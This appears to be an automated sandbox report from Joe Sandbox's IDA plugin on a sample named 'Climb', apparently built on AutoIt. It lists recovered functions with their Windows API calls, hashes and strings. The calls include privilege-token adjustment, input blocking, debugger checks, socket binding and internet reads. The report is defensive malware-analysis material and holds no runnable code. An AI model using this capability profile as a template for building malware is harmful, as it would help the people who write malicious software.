Opcode Fuzzy Hash: 5da3337a99b107f6937fea6d52349e7a9713506e06b099386bcc124e5d37e112
Instruction Fuzzy Hash: 9F118B74600705BFE7218F26DC48F677BB9EBC9B41F14826DB522D62A0DB71ED049A30

Function 004E20AA Relevance: 9.1, APIs: 6, Instructions: 68memoryCOMMON

Download Yara Rule

APIs

Part of subcall function 004E1900: GetTokenInformation.ADVAPI32(?,00000002,?,00000000,?), ref: 004E1916
Part of subcall function 004E1900: GetLastError.KERNEL32(?,00000002,?,00000000,?), ref: 004E1922
Part of subcall function 004E1900: GetProcessHeap.KERNEL32(00000008,?,?,00000002,?,00000000,?), ref: 004E1931
Part of subcall function 004E1900: HeapAlloc.KERNEL32(00000000,?,00000002,?,00000000,?), ref: 004E1938
Part of subcall function 004E1900: GetTokenInformation.ADVAPI32(?,00000002,00000000,?,?,?,00000002,?,00000000,?), ref: 004E194E

GetLengthSid.ADVAPI32(?,00000000,004E1C81), ref: 004E20FB
GetProcessHeap.KERNEL32(00000008,00000000), ref: 004E2107
HeapAlloc.KERNEL32(00000000), ref: 004E210E
CopySid.ADVAPI32(00000000,00000000,?), ref: 004E2127
GetProcessHeap.KERNEL32(00000000,00000000,004E1C81), ref: 004E213B
HeapFree.KERNEL32(00000000), ref: 004E2142

Memory Dump Source

Source File: 0000000E.00000002.2524387379.0000000000481000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00480000, based on PE: true

Associated: 0000000E.00000002.2524366691.0000000000480000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000E.00000002.2524470578.000000000051D000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000E.00000002.2524470578.0000000000543000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000E.00000002.2524523247.000000000054D000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000E.00000002.2524540903.0000000000555000.00000002.00000001.01000000.0000000A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_14_2_480000_Climb.jbxd

Similarity

API ID: Heap$Process$AllocInformationToken$CopyErrorFreeLastLength
String ID:
API String ID: 3008561057-0
Opcode ID: bb0d9d3131894ce3c37067f043f596a8fd4089b1a8b5d8f393bb92bf6c7d080a
Instruction ID: 56e326f4cb0f0a3a8a4febabf68bfaf109a23c030ebb169c6171c69cbcf99ee4
Opcode Fuzzy Hash: bb0d9d3131894ce3c37067f043f596a8fd4089b1a8b5d8f393bb92bf6c7d080a
Instruction Fuzzy Hash: 4D11DC71540204FFDB109F65CD08BAFBBBDEF54356F10801AE98193220C7799A04DB68

Function 004FA570 Relevance: 8.9, APIs: 4, Strings: 1, Instructions: 119filesleepCOMMON

Download Yara Rule

APIs

Part of subcall function 0048B329: _wcslen.LIBCMT ref: 0048B333

FindFirstFileW.KERNEL32(00000001,?,*.*,?,?,00000000,00000000), ref: 004FA5BD
FindClose.KERNEL32(00000000,?,00000000,00000000), ref: 004FA6D0

Part of subcall function 004F42B9: GetInputState.USER32 ref: 004F4310
Part of subcall function 004F42B9: PeekMessageW.USER32(?,00000000,00000000,00000000,00000001), ref: 004F43AB

Sleep.KERNEL32(0000000A,?,00000000,00000000), ref: 004FA5ED
FindNextFileW.KERNEL32(?,?,?,00000000,00000000), ref: 004FA6BA

Strings

*.*, xrefs: 004FA5A2

Memory Dump Source

Source File: 0000000E.00000002.2524387379.0000000000481000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00480000, based on PE: true

Associated: 0000000E.00000002.2524366691.0000000000480000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000E.00000002.2524470578.000000000051D000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000E.00000002.2524470578.0000000000543000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000E.00000002.2524523247.000000000054D000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000E.00000002.2524540903.0000000000555000.00000002.00000001.01000000.0000000A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_14_2_480000_Climb.jbxd

Similarity

API ID: Find$File$CloseFirstInputMessageNextPeekSleepState_wcslen
String ID: *.*
API String ID: 1972594611-438819550
Opcode ID: 731be5f9f1affa9230c51a47eb9bfb4b7da80a4e0450667604d39cf52c313c62
Instruction ID: 57630b42d867a0b2ce256bcc68f8543b44b32610b5f6fd57e5dcc430c71f6665
Opcode Fuzzy Hash: 731be5f9f1affa9230c51a47eb9bfb4b7da80a4e0450667604d39cf52c313c62
Instruction Fuzzy Hash: 7A4184B190020EAFDF10EF64C849AEE7BB4EF15314F14445BE919E2291EB349E58CFA5

Function 00502263 Relevance: 7.7, APIs: 5, Instructions: 153networkCOMMON

Download Yara Rule

APIs

Part of subcall function 00503AAB: inet_addr.WSOCK32(?,?,?,?,?,00000000), ref: 00503AD7
Part of subcall function 00503AAB: _wcslen.LIBCMT ref: 00503AF8

socket.WSOCK32(00000002,00000002,00000011,?,?,00000000), ref: 005022BA
WSAGetLastError.WSOCK32 ref: 005022E1
bind.WSOCK32(00000000,?,00000010), ref: 00502338
WSAGetLastError.WSOCK32 ref: 00502343
closesocket.WSOCK32(00000000), ref: 00502372

Memory Dump Source

Source File: 0000000E.00000002.2524387379.0000000000481000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00480000, based on PE: true

Associated: 0000000E.00000002.2524366691.0000000000480000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000E.00000002.2524470578.000000000051D000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000E.00000002.2524470578.0000000000543000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000E.00000002.2524523247.000000000054D000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000E.00000002.2524540903.0000000000555000.00000002.00000001.01000000.0000000A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_14_2_480000_Climb.jbxd

Similarity

API ID: ErrorLast$_wcslenbindclosesocketinet_addrsocket
String ID:
API String ID: 1601658205-0
Opcode ID: b3c414a15163a0b33abd9aebaca4e852ac078ecfe22c784e63196a287164ea2d
Instruction ID: 0fb6a490f6d4a61f6171252359ab08cc97f0ca0bc856e8319da6c2be52c45b8b
Opcode Fuzzy Hash: b3c414a15163a0b33abd9aebaca4e852ac078ecfe22c784e63196a287164ea2d
Instruction Fuzzy Hash: 9251D475A00200AFDB10AF25C88AF6E7BE5AB44718F54849DF9099F3D3D774AC41CBA1

Function 005126DD Relevance: 7.6, APIs: 5, Instructions: 83windowCOMMON

Download Yara Rule

APIs

IsWindowVisible.USER32 ref: 0051275C
IsWindowEnabled.USER32 ref: 0051276A
GetForegroundWindow.USER32(?,?,00000001,?), ref: 00512777
IsIconic.USER32 ref: 00512785
IsZoomed.USER32 ref: 00512793

Memory Dump Source

Source File: 0000000E.00000002.2524387379.0000000000481000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00480000, based on PE: true

Associated: 0000000E.00000002.2524366691.0000000000480000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000E.00000002.2524470578.000000000051D000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000E.00000002.2524470578.0000000000543000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000E.00000002.2524523247.000000000054D000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000E.00000002.2524540903.0000000000555000.00000002.00000001.01000000.0000000A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_14_2_480000_Climb.jbxd

Similarity

API ID: Window$EnabledForegroundIconicVisibleZoomed
String ID:
API String ID: 292994002-0
Opcode ID: e0dc745dd696a48047575850305f7f0dfc1bb7ac0d2fbf33deb211ea37319874
Instruction ID: c1102889da19bb49fc889486c516cbdcad82790e92901693e0f95e4f74968807
Opcode Fuzzy Hash: e0dc745dd696a48047575850305f7f0dfc1bb7ac0d2fbf33deb211ea37319874
Instruction Fuzzy Hash: 9C21F1357002108FF7109F26C844B9BBFA5FF95324F59806DE84A8B291D771EC82CBA0

Function 004FD889 Relevance: 6.1, APIs: 4, Instructions: 75filenetworkCOMMON

Download Yara Rule

APIs

InternetReadFile.WININET(?,?,00000400,?), ref: 004FD8CE
GetLastError.KERNEL32(?,00000000), ref: 004FD92F
SetEvent.KERNEL32(?,?,00000000), ref: 004FD943

Memory Dump Source

Source File: 0000000E.00000002.2524387379.0000000000481000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00480000, based on PE: true

Associated: 0000000E.00000002.2524366691.0000000000480000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000E.00000002.2524470578.000000000051D000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000E.00000002.2524470578.0000000000543000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000E.00000002.2524523247.000000000054D000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000E.00000002.2524540903.0000000000555000.00000002.00000001.01000000.0000000A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_14_2_480000_Climb.jbxd

Similarity

API ID: ErrorEventFileInternetLastRead
String ID:
API String ID: 234945975-0
Opcode ID: b0193ad08b9527178ce289385fcd8d290c6ef2e21616e7485e4eacf41a310469
Instruction ID: 7ab416bdfa51fbe02b212fb2450a70427756dc83359b6204334e505a857c8ea4
Opcode Fuzzy Hash: b0193ad08b9527178ce289385fcd8d290c6ef2e21616e7485e4eacf41a310469
Instruction Fuzzy Hash: 2F21A4B1900709AFE7209FA6C844FA777FDEF51314F10841EE65692241D7B8EA05DB68

Function 004EE472 Relevance: 6.0, APIs: 4, Instructions: 29filestringCOMMON

Download Yara Rule

APIs

lstrlenW.KERNEL32(?,004C46AC), ref: 004EE482
GetFileAttributesW.KERNEL32(?), ref: 004EE491
FindFirstFileW.KERNEL32(?,?), ref: 004EE4A2
FindClose.KERNEL32(00000000), ref: 004EE4AE

Memory Dump Source

Source File: 0000000E.00000002.2524387379.0000000000481000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00480000, based on PE: true

Associated: 0000000E.00000002.2524366691.0000000000480000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000E.00000002.2524470578.000000000051D000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000E.00000002.2524470578.0000000000543000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000E.00000002.2524523247.000000000054D000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000E.00000002.2524540903.0000000000555000.00000002.00000001.01000000.0000000A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_14_2_480000_Climb.jbxd

Similarity

API ID: FileFind$AttributesCloseFirstlstrlen
String ID:
API String ID: 2695905019-0
Opcode ID: 7094439097d9ab4b52d812c4b9e390a1d06d20b9b17c0bf67b45c5c7d0ce2351
Instruction ID: 351eb450f77b3acc8a61a39531531edfe34fddaa07acde441977eb3792902ebc
Opcode Fuzzy Hash: 7094439097d9ab4b52d812c4b9e390a1d06d20b9b17c0bf67b45c5c7d0ce2351
Instruction Fuzzy Hash: 8AF0E53141092067D210773DAC0D8EB77BDAF52336B508702F836C21F0D77C9D99A6AA

Function 004DE5F4 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 17timeCOMMON

Download Yara Rule

APIs

GetLocalTime.KERNEL32(?), ref: 004DE5F8

Strings

X64, xrefs: 004DE680
%.3d, xrefs: 004DE603

Memory Dump Source

Source File: 0000000E.00000002.2524387379.0000000000481000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00480000, based on PE: true

Associated: 0000000E.00000002.2524366691.0000000000480000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000E.00000002.2524470578.000000000051D000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000E.00000002.2524470578.0000000000543000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000E.00000002.2524523247.000000000054D000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000E.00000002.2524540903.0000000000555000.00000002.00000001.01000000.0000000A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_14_2_480000_Climb.jbxd

Similarity

API ID: LocalTime
String ID: %.3d$X64
API String ID: 481472006-1077770165
Opcode ID: 525fdeb3379cbec539bcff3d80ec8c4f6938ebc4b89ec7a2ebba6d6f5d1f2d7e
Instruction ID: 436401344d24b44f47178702bfd327d7cd53946d7652be53208045c121ee7642
Opcode Fuzzy Hash: 525fdeb3379cbec539bcff3d80ec8c4f6938ebc4b89ec7a2ebba6d6f5d1f2d7e
Instruction Fuzzy Hash: 40D012B1C08118E6CF80EB929C98DF9777CBB28700F948867F916D5140E63CD94AA72B

Function 004B2992 Relevance: 4.6, APIs: 3, Instructions: 78COMMONLIBRARYCODE

Download Yara Rule

APIs

IsDebuggerPresent.KERNEL32(?,?,?,?,?,0000000A), ref: 004B2A8A
SetUnhandledExceptionFilter.KERNEL32(00000000,?,?,?,?,?,0000000A), ref: 004B2A94
UnhandledExceptionFilter.KERNEL32(?,?,?,?,?,?,0000000A), ref: 004B2AA1

Memory Dump Source

Source File: 0000000E.00000002.2524387379.0000000000481000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00480000, based on PE: true

Associated: 0000000E.00000002.2524366691.0000000000480000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000E.00000002.2524470578.000000000051D000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000E.00000002.2524470578.0000000000543000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000E.00000002.2524523247.000000000054D000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000E.00000002.2524540903.0000000000555000.00000002.00000001.01000000.0000000A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_14_2_480000_Climb.jbxd

Similarity

API ID: ExceptionFilterUnhandled$DebuggerPresent
String ID:
API String ID: 3906539128-0
Opcode ID: 4e398c54bc1c63bb85015420ebc02f12dfc8e1934d8a53f9bbaf79d697416385
Instruction ID: 1a420a6a35729cd87ff95b37a908b60dbedd63aae832c2085ab8b56c51bd2d34
Opcode Fuzzy Hash: 4e398c54bc1c63bb85015420ebc02f12dfc8e1934d8a53f9bbaf79d697416385
Instruction Fuzzy Hash: E031D67590122C9BCB21DF68D9887DDBBB8AF18310F5081DAE81CA7260E7749F858F59

Function 004E2010 Relevance: 4.6, APIs: 3, Instructions: 68COMMON

Download Yara Rule

APIs

Part of subcall function 004A014B: __CxxThrowException@8.LIBVCRUNTIME ref: 004A09D8
Part of subcall function 004A014B: __CxxThrowException@8.LIBVCRUNTIME ref: 004A09F5

LookupPrivilegeValueW.ADVAPI32(00000000,00000000,00000004), ref: 004E205A
AdjustTokenPrivileges.ADVAPI32(?,00000000,00000000,?,00000000,?), ref: 004E2087
GetLastError.KERNEL32 ref: 004E2097

Memory Dump Source

Source File: 0000000E.00000002.2524387379.0000000000481000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00480000, based on PE: true

Associated: 0000000E.00000002.2524366691.0000000000480000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000E.00000002.2524470578.000000000051D000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000E.00000002.2524470578.0000000000543000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000E.00000002.2524523247.000000000054D000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000E.00000002.2524540903.0000000000555000.00000002.00000001.01000000.0000000A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_14_2_480000_Climb.jbxd

Similarity

API ID: Exception@8Throw$AdjustErrorLastLookupPrivilegePrivilegesTokenValue
String ID:
API String ID: 577356006-0
Opcode ID: 6627a2cc3acace796d8856d3ecaaef6b00befddf74028bdc90a2246690d0b27c
Instruction ID: 0d104e8680e85f943e6c01f5fcc06729f067800e2e7ce0a636012f46af542fd0
Opcode Fuzzy Hash: 6627a2cc3acace796d8856d3ecaaef6b00befddf74028bdc90a2246690d0b27c
Instruction Fuzzy Hash: 4211BFB1400204BFD718AF55DDC6DABB7BCEB05715B20841EE55653291EBB5BC41CA28

Function 004A5058 Relevance: 4.5, APIs: 3, Instructions: 20COMMONLIBRARYCODE

Download Yara Rule

APIs

GetCurrentProcess.KERNEL32(?,?,004A502E,?,005498D8,0000000C,004A5185,?,00000002,00000000), ref: 004A5079
TerminateProcess.KERNEL32(00000000,?,004A502E,?,005498D8,0000000C,004A5185,?,00000002,00000000), ref: 004A5080
ExitProcess.KERNEL32 ref: 004A5092

Memory Dump Source

Source File: 0000000E.00000002.2524387379.0000000000481000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00480000, based on PE: true

Associated: 0000000E.00000002.2524366691.0000000000480000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000E.00000002.2524470578.000000000051D000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000E.00000002.2524470578.0000000000543000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000E.00000002.2524523247.000000000054D000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000E.00000002.2524540903.0000000000555000.00000002.00000001.01000000.0000000A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_14_2_480000_Climb.jbxd

Similarity

API ID: Process$CurrentExitTerminate
String ID:
API String ID: 1703294689-0
Opcode ID: 97a867c0fb536ebd8121c2626676ae27d78809b35043a6f429818253bbb7dac6
Instruction ID: 1385793a84f5449050b8a71b10e4d30bdaeefcfd407ae0723a2958857939f20e
Opcode Fuzzy Hash: 97a867c0fb536ebd8121c2626676ae27d78809b35043a6f429818253bbb7dac6
Instruction Fuzzy Hash: 99E08C32000508AFCF216F51CE08E893B79EF31386F008419F8098A231DB39DD42DBE4

Function 004DE652 Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 10COMMON

Download Yara Rule

APIs

GetUserNameW.ADVAPI32(?,?), ref: 004DE664

Strings

X64, xrefs: 004DE680

Memory Dump Source

Source File: 0000000E.00000002.2524387379.0000000000481000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00480000, based on PE: true

Associated: 0000000E.00000002.2524366691.0000000000480000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000E.00000002.2524470578.000000000051D000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000E.00000002.2524470578.0000000000543000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000E.00000002.2524523247.000000000054D000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000E.00000002.2524540903.0000000000555000.00000002.00000001.01000000.0000000A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_14_2_480000_Climb.jbxd

Similarity

API ID: NameUser
String ID: X64
API String ID: 2645101109-893830106
Opcode ID: 9302a83bfed743411243593db0611f6284f9a8f79c2d709fabc1c35e7d71f82e
Instruction ID: df3507398e0079c59afebebd0905c3d4c3d60bf6cd396cec3f7a979731cd2bc4
Opcode Fuzzy Hash: 9302a83bfed743411243593db0611f6284f9a8f79c2d709fabc1c35e7d71f82e
Instruction Fuzzy Hash: AAD0C9B480111DEACF80DB50ECCCED9777CBB14304F104662F146A2140D734A54A9B24

Function 004F41FA Relevance: 3.0, APIs: 2, Instructions: 33windowCOMMON

Download Yara Rule

APIs

GetLastError.KERNEL32(00000000,?,00000FFF,00000000,?,?,?,005052EE,?,?,00000035,?), ref: 004F4229
FormatMessageW.KERNEL32(00001000,00000000,?,00000000,?,00000FFF,00000000,?,?,?,005052EE,?,?,00000035,?), ref: 004F4239

Memory Dump Source

Source File: 0000000E.00000002.2524387379.0000000000481000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00480000, based on PE: true

Associated: 0000000E.00000002.2524366691.0000000000480000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000E.00000002.2524470578.000000000051D000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000E.00000002.2524470578.0000000000543000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000E.00000002.2524523247.000000000054D000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000E.00000002.2524540903.0000000000555000.00000002.00000001.01000000.0000000A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_14_2_480000_Climb.jbxd

Similarity

API ID: ErrorFormatLastMessage
String ID:
API String ID: 3479602957-0
Opcode ID: ffd471630689be707f8dadda33fa84a9e603b79633f484482c487736220ebeac
Instruction ID: b3b3a20eb93117ca4a7944a2331a057d6a150a8b8b0031792f13a92c8ee8ddc3
Opcode Fuzzy Hash: ffd471630689be707f8dadda33fa84a9e603b79633f484482c487736220ebeac
Instruction Fuzzy Hash: 5CF0E5346002286AE72027669C4DFFB767DEFC5761F0001BAF619D2281DA749904C7B5

Function 004E1A0B Relevance: 3.0, APIs: 2, Instructions: 24COMMON

Download Yara Rule

APIs

AdjustTokenPrivileges.ADVAPI32(?,00000000,?,00000000,00000000,00000000,?,004E1B48), ref: 004E1A20
CloseHandle.KERNEL32(?,?,004E1B48), ref: 004E1A35

Memory Dump Source

Source File: 0000000E.00000002.2524387379.0000000000481000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00480000, based on PE: true

Associated: 0000000E.00000002.2524366691.0000000000480000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000E.00000002.2524470578.000000000051D000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000E.00000002.2524470578.0000000000543000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000E.00000002.2524523247.000000000054D000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000E.00000002.2524540903.0000000000555000.00000002.00000001.01000000.0000000A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_14_2_480000_Climb.jbxd

Similarity

API ID: AdjustCloseHandlePrivilegesToken
String ID:
API String ID: 81990902-0
Opcode ID: 3b60ccbc67e47d37198112faa73302bb5d9f8be147d01fc6c414aef2effc0860
Instruction ID: 515223b684b55d1cc2bc367055d92f4497cd9a94a520feef5ca646f3670c418b
Opcode Fuzzy Hash: 3b60ccbc67e47d37198112faa73302bb5d9f8be147d01fc6c414aef2effc0860
Instruction Fuzzy Hash: FCE01A72004610AFE7252B21EC09EB6B7A9EB04311F14882EB4A580470DA62AC90EA14

Function 004FF4FF Relevance: 1.5, APIs: 1, Instructions: 25keyboardCOMMON

Download Yara Rule

APIs

BlockInput.USER32(00000001), ref: 004FF51A

Memory Dump Source

Source File: 0000000E.00000002.2524387379.0000000000481000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00480000, based on PE: true

Associated: 0000000E.00000002.2524366691.0000000000480000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000E.00000002.2524470578.000000000051D000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000E.00000002.2524470578.0000000000543000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000E.00000002.2524523247.000000000054D000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000E.00000002.2524540903.0000000000555000.00000002.00000001.01000000.0000000A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_14_2_480000_Climb.jbxd

Similarity

API ID: BlockInput
String ID:
API String ID: 3456056419-0
Opcode ID: 6df82986b6f8fc2e06ecb408598943301f11d97af1f065ec41e983c3aaafaacd
Instruction ID: 579b515a2cb647964b27345459ebdbbeb5dabe78cd85c77472928c958ee5e04a
Opcode Fuzzy Hash: 6df82986b6f8fc2e06ecb408598943301f11d97af1f065ec41e983c3aaafaacd
Instruction Fuzzy Hash: 2BE0D8312002046FC710EF6AD40099AF7ECEFA4364F00842BF949C7312D674F8448BA4

Function 004EEC6C Relevance: 1.5, APIs: 1, Instructions: 24COMMON

Download Yara Rule

APIs

mouse_event.USER32(00000002,00000000,00000000,00000000,00000000), ref: 004EEC95

Memory Dump Source

Source File: 0000000E.00000002.2524387379.0000000000481000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00480000, based on PE: true

Associated: 0000000E.00000002.2524366691.0000000000480000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000E.00000002.2524470578.000000000051D000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000E.00000002.2524470578.0000000000543000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000E.00000002.2524523247.000000000054D000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000E.00000002.2524540903.0000000000555000.00000002.00000001.01000000.0000000A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_14_2_480000_Climb.jbxd

Similarity

API ID: mouse_event
String ID:
API String ID: 2434400541-0
Opcode ID: fbc5d94d52a7a4929d1b35ec2ba5819bb825256f49f8c20687daf6c736a822b3
Instruction ID: f46b0293701d4f5fd40438317907655656b0d1a4cff30960a687699e57229279
Opcode Fuzzy Hash: fbc5d94d52a7a4929d1b35ec2ba5819bb825256f49f8c20687daf6c736a822b3
Instruction Fuzzy Hash: 24D017B619038069F8180B3F8B2FE77090AA302747FA0434BB202D9695E589B947A12E

Function 004A0D45 Relevance: 1.5, APIs: 1, Instructions: 3COMMON

Download Yara Rule

APIs

SetUnhandledExceptionFilter.KERNEL32(Function_00020D51,004A075E), ref: 004A0D4A

Memory Dump Source

Source File: 0000000E.00000002.2524387379.0000000000481000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00480000, based on PE: true

Associated: 0000000E.00000002.2524366691.0000000000480000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000E.00000002.2524470578.000000000051D000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000E.00000002.2524470578.0000000000543000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000E.00000002.2524523247.000000000054D000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000E.00000002.2524540903.0000000000555000.00000002.00000001.01000000.0000000A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_14_2_480000_Climb.jbxd

Similarity

API ID: ExceptionFilterUnhandled
String ID:
API String ID: 3192549508-0
Opcode ID: 4b18846cd916939438d97e6bf500fdd0415f4ff2def451fbfb17f683bbad5d1c
Instruction ID: 774c25555808b9d602312a149bfa404212ee4ace65b1a82da89187b932bc0de6
Opcode Fuzzy Hash: 4b18846cd916939438d97e6bf500fdd0415f4ff2def451fbfb17f683bbad5d1c
Instruction Fuzzy Hash:

Function 0050353B Relevance: 77.5, APIs: 40, Strings: 4, Instructions: 486filecommemoryCOMMON

Download Yara Rule

APIs

DeleteObject.GDI32(00000000), ref: 0050358D
DeleteObject.GDI32(00000000), ref: 005035A0
DestroyWindow.USER32 ref: 005035AF
GetDesktopWindow.USER32 ref: 005035CA
GetWindowRect.USER32(00000000), ref: 005035D1
SetRect.USER32(?,00000000,00000000,00000007,00000002), ref: 00503700
AdjustWindowRectEx.USER32(?,88C00000,00000000,?), ref: 0050370E
CreateWindowExW.USER32(?,AutoIt v3,?,88C00000,000000FF,000000FF,?,?,00000000,00000000,00000000), ref: 00503755
GetClientRect.USER32(00000000,?), ref: 00503761
CreateWindowExW.USER32(00000000,static,00000000,5000000E,00000000,00000000,?,?,00000000,00000000,00000000), ref: 0050379D
CreateFileW.KERNEL32(?,80000000,00000000,00000000,00000003,00000000,00000000,?,88C00000,000000FF,000000FF,?,?,00000000,00000000,00000000), ref: 005037BF
GetFileSize.KERNEL32(00000000,00000000,?,88C00000,000000FF,000000FF,?,?,00000000,00000000,00000000), ref: 005037D2
GlobalAlloc.KERNEL32(00000002,00000000,?,88C00000,000000FF,000000FF,?,?,00000000,00000000,00000000), ref: 005037DD
GlobalLock.KERNEL32(00000000), ref: 005037E6
ReadFile.KERNEL32(00000000,00000000,00000000,?,00000000,?,88C00000,000000FF,000000FF,?,?,00000000,00000000,00000000), ref: 005037F5
GlobalUnlock.KERNEL32(00000000), ref: 005037FE
CloseHandle.KERNEL32(00000000,?,88C00000,000000FF,000000FF,?,?,00000000,00000000,00000000), ref: 00503805
GlobalFree.KERNEL32(00000000), ref: 00503810
CreateStreamOnHGlobal.OLE32(00000000,00000001,?,?,88C00000,000000FF,000000FF,?,?,00000000,00000000,00000000), ref: 00503822
OleLoadPicture.OLEAUT32(?,00000000,00000000,00520C04,00000000), ref: 00503838
GlobalFree.KERNEL32(00000000), ref: 00503848
CopyImage.USER32(00000007,00000000,00000000,00000000,00002000), ref: 0050386E
SendMessageW.USER32(00000000,00000172,00000000,00000007), ref: 0050388D
SetWindowPos.USER32(00000000,00000000,00000000,00000000,?,?,00000020,?,88C00000,000000FF,000000FF,?,?,00000000,00000000,00000000), ref: 005038AF
ShowWindow.USER32(00000004,?,88C00000,000000FF,000000FF,?,?,00000000,00000000,00000000), ref: 00503A9C

Strings

AutoIt v3, xrefs: 0050374F
DISPLAY, xrefs: 005038FF
, xrefs: 00503A22
static, xrefs: 00503797, 005038EE

Memory Dump Source

Source File: 0000000E.00000002.2524387379.0000000000481000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00480000, based on PE: true

Associated: 0000000E.00000002.2524366691.0000000000480000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000E.00000002.2524470578.000000000051D000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000E.00000002.2524470578.0000000000543000.00000002.00000001.01000000.0000000A.sdmpDownload File
